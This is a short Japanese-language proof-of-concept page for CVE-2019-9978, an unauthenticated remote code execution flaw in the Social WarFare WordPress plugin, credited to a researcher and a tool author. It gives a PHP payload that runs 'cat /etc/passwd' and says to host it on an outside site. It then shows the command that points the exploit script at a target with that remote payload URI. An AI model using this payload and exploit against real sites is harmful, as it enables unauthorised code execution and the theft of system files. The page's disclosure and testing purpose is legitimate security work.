
CVE-2019-9978 - (PoC) Social WarFare Plugin (<=3.5.2) におけるRCE
CVE-2019-9978 - Social WarFare プラグイン (<=3.5.2) における (PoC) RCE
設定のインポートを処理する機能において、認証されていないリモートコード実行が発見されました。ユーザーは RFI を利用して RCE を実行できます。
以下のペイロードをコピーします:
<pre>system('cat /etc/passwd')</pre>
payload.txt というファイル名で保存し、サーバーにアップロードします。URI は http(s)://yoursite.com/payload.txt のようになります。最後に、--target と --payload-uri オプションを指定します:
$ python cve-2019-9978.py --target http://vulntarget.com \
--payload-uri http://yourpayloadsite.com/payload.txt

研究者: Luka Sikic
リンク: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
作者: @hash3liZer